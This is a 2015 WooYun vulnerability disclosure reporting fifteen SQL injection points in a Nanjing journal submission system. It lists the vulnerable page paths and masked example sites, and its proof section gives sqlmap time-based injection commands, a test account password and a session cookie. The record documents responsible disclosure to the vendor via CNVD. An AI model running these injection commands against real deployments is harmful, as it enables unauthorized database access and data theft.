当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124644

漏洞标题:南京杰诺瀚期刊投稿系统15处SQL注入打包提交

相关厂商:南京杰诺瀚软件科技有限公司

漏洞作者: 贫道来自河北

提交时间:2015-07-08 16:51

修复时间:2015-10-08 19:06

公开时间:2015-10-08 19:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向第三方安全合作伙伴开放
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

需要注册一个账号,但是不鸡肋,因为所有涉及的案例都可以注册

详细说明:

南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据... 官网:http://**.**.**.**/

QQ图片20150705120505.png


注入点:
Tougao/WangYinList.aspx?searchid=0&page=1
Tougao/DingDanList.aspx?searchid=0&page=1
Tougao/AuthorGaoJianList.aspx?searchid=0&page=1
Tougao/WorkList.aspx?searchid=0&page=1
Tougao/msgList.aspx?searchid=59214
Tougao/ViewMsg.aspx?ItemNo=784&state=Send
Tougao/TipsIcon.aspx?State=&IconName=MsgView
Tougao/DingDanView.aspx?Add=1
Tougao/SelectAuthor.aspx?sGaoHao=2009003052
Tougao/DownloadList.aspx?sGaoHao=2009003052
Tougao/DownFile.aspx?FileId=5535
Tougao/WriteMsg.aspx?gid=2009003052
Tougao/CreateTouGao.aspx?sGaoHao=2009003052
Tougao/ViewGaoJian.aspx?sGaoHao=2009003052
Tougao/AuthorManager.aspx?owner=1071
案例:
http://**.**.**.**/Web/Login.aspx
http://**.**.**.**/Web/CommonPage.aspx?Id=14
http://**.**.**.**/Web/CommonPage.aspx?Id=14
http://**.**.**.**/Web/CommonPage.aspx?Id=6
http://**.**.**.**
http://**.**.**.**/Web/Qikan.aspx
http://**.**.**.**/CommonPage.aspx?Id=6
http://**.**.**.**/web/CommonPage.aspx?Id=36
http://**.**.**.**/Web/CommonPage.aspx?Id=1
http://**.**.**.**/Web/CommonPage.aspx?Id=1
http://**.**.**.**/Web/Qikan.aspx

漏洞证明:

由于注入点较多
我就只演示2个站的注入啦
http://**.**.**.**/Tougao/DingDanView.aspx?Add=1
账号密码都是aizai2010 如果是第一次注入需要cookie,我已经注入过了所以不用cookie
http://**.**.**.**/Tougao/DingDanView.aspx?Add=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --current-user -v 3 --batch

QQ图片20150705121217.jpg


QQ图片20150705121232.jpg


http://**.**.**.**/Tougao/AuthorGaoJianList.aspx?searchid=0&page=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch

QQ图片20150705123613.jpg


http://**.**.**.**/Tougao/AuthorManager.aspx?owner=6798
账号密码都是aizai2010 如果是第一次注入需要cookie
sqlmap.py -u "http://**.**.**.**/Tougao/AuthorManager.aspx?owner=6798%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --current-user -v 3 --batch --cookie " _ga=GA1.2.207810116.1435997856; reurl=http://**.**.**.**/Tougao/Main.htm; dnt=userid=6798&password=a198XrE3XTilfJeae4337Ap2zI0kj%2fM4nmXkgDLzyRTY1CZwRNipAg%3d%3d&tpp=0&ppp=0&pmsound=&invisible=1&referer=index.aspx&sigstatus=0&expires=-1; lastolupdate=1475965671"

QQ图片20150705121430.jpg


QQ图片20150705121445.jpg


其他的注入点也都可以复现不信自己试试

修复方案:

版权声明:转载请注明来源 贫道来自河北@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-07-10 19:04

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无